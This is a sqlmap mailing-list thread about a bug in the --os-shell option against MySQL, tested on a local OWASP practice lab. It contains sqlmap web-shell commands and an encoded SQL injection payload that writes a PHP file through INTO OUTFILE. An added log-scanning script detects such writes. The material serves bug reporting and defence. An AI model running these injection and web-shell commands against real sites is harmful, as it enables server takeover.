Thank you for your report. Fixed with the latest revision (
https://github.com/sqlmapproject/sqlmap/issues/1290)
Bye
On Sun, Jul 5, 2015 at 1:16 AM, Danux <dan...@gmail.com> wrote:
> With yours it is not throwing the error. You can reproduce my case with the
> owasppractice examples; I am attaching the source code here, you will need
> to set up the DB. Once up and running try lesson03:
>
> sqlmap.py -u http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell --prefix "\")" -v3
>
> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
> payloads specific for other DBMSes? [Y/n]
> Y
> for the remaining tests, do you want to include all tests for 'MySQL'
> extending provided level (1) and risk (1) values? [Y/n]
> n
>
> And you should get the same error handling issue.
>
>
>
> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> Something really wrong is happening here. One user is having the
>> identical problem as you (AttributeError: 'NoneType' object has no
>> attribute 'replace') and I am not able to reproduce it.
>>
>> Can you please rerun your sqlmap version with "
>> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>> the same error?
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <dan...@gmail.com> wrote:
>>
>>> Just cloned git and got the 1.0-dev-166dc98 version, but got an unhandled
>>> exception error:
>>>
>>> ./sqlmap.py -u
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>> --os-shell --prefix "\")" --flush-session -v3
>>>
>>> /sqlmap'. If the exception persists, please open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any other information required to reproduce the bug. The
>>> developers will try to reproduce the bug, fix it accordingly and get back
>>> to you
>>> sqlmap version: 1.0-dev-166dc98
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -u
>>> *********************************************************************
>>> --os-shell --prefix ") --flush-session -v3
>>> Technique: None
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>> File "sqlmap.py", line 102, in main
>>> start()
>>> File "lib/controller/controller.py", line 514, in start
>>> injection = checkSqlInjection(place, parameter, value)
>>> File "lib/controller/checks.py", line 391, in checkSqlInjection
>>> reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>> where=where)
>>> File "lib/core/agent.py", line 188, in payload
>>> retVal = _(regex, "%s=%s" % (parameter,
>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>
>>>
>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>
>>>> I believe that you are using an old revision. For a long time now there
>>>> has been at least a git revision or a pseudo "non-git" number appearing
>>>> when "sqlmap --version" is used.
>>>>
>>>> Please update to the latest revision from the official github
>>>> repository and rerun sqlmap.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <dan...@gmail.com> wrote:
>>>>
>>>>> Thanks
>>>>>
>>>>> sqlmap --version
>>>>> sqlmap/1.0-dev
>>>>>
>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
>>>>> miroslav.stam...@gmail.com> wrote:
>>>>>
>>>>>> Which revision/version of sqlmap do you use? There was a related
>>>>>> patch a month ago. Will check tomorrow.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <dan...@gmail.com> wrote:
>>>>>>
>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>
>>>>>>> Description:
>>>>>>>
>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>> create an empty file, e.g. tmpbezff.php; this causes every
>>>>>>> subsequent PAYLOAD attempt to fail with an "already exist" error, so
>>>>>>> the web shell cannot be uploaded.
>>>>>>>
>>>>>>>
>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%[...]--+
>>>>>>>
>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>
>>>>>>> mysql> select 'ss' into outfile
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>> ERROR 1086 (HY000): File
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>
>>>>>>> Solution:
>>>>>>>
>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>>>> when using the --os-shell option
>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>
>>>>>>> --
>>>>>>> DanUx
--
Miroslav Stampar
http://about.me/stamparm
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
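
A defender-side view of the request quoted in the original report, as an added example that is not part of the thread or of sqlmap: it scans web access-log lines for a decoded `INTO OUTFILE` / `INTO DUMPFILE` clause and flags writes of script files. The log lines, the function names and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

REQUEST = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# INTO OUTFILE / INTO DUMPFILE followed by a quoted path
FILE_WRITE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\2", re.I | re.S)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")  # assumed list, adjust per stack

# Constructed access-log lines (common log format); only the path shape follows the report.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2015:00:31:02 +0000] '
    '"GET /injection/lessons/lesson03/index.php?code=NTGRWNR HTTP/1.1" 200 812',
    '203.0.113.7 - - [05/Jul/2015:00:33:10 +0000] '
    '"GET /injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1'
    '%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27--+ HTTP/1.1" 200 640',
    '198.51.100.9 - - [05/Jul/2015:00:40:44 +0000] '
    '"GET /index.php?code=1%2520INTO%2520DUMPFILE%2520%2527/tmp/out.txt%2527 HTTP/1.1" 200 95',
]

def decode_fully(value, max_rounds=3):
    """Undo nested URL encoding (%2527 -> %27 -> ') so the clause becomes visible."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_file_writes(log_lines):
    """Return one finding per request whose query string carries a file-write clause."""
    findings = []
    for line in log_lines:
        req = REQUEST.search(line)
        if not req:
            continue
        query = decode_fully(urlsplit(req["target"]).query)
        hit = FILE_WRITE.search(query)
        if hit:
            path = hit["path"]
            findings.append({
                "client": req["client"],
                "clause": hit[1].upper(),
                "path": path,
                "script": path.lower().endswith(SCRIPT_EXT),  # likely web shell drop
            })
    return findings

if __name__ == "__main__":
    for finding in find_file_writes(SAMPLE_LOG):
        print(finding)
```

On the database side, MySQL's `secure_file_priv` setting and withholding the `FILE` privilege from the application account restrict where such a statement can write.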